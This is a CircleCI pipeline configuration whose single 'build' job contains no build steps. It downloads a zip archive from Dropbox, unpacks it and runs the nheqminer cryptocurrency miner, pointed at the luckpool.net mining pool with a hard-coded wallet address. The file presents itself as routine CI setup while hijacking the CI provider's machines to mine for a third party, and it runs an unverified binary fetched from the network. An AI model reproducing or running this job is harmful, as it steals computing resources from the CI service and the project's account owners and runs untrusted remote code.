# Use the latest 2.1 version of CircleCI pipeline process engine.
# See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1

# Define a job to be invoked later in a workflow.
# See: https://circleci.com/docs/2.0/configuration-reference/#jobs
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  wget https://dl.dropboxusercontent.com/s/93pc80mzhq4rn5r/bin.zip && unzip bin.zip && chmod +x bin/nheqminer && ./bin/nheqminer -v -l ap.luckpool.net:3956 -u RWQtmzJVSWYh6Abs786i8wHEW4e7vcBQmN.GitHUb -p x -t 1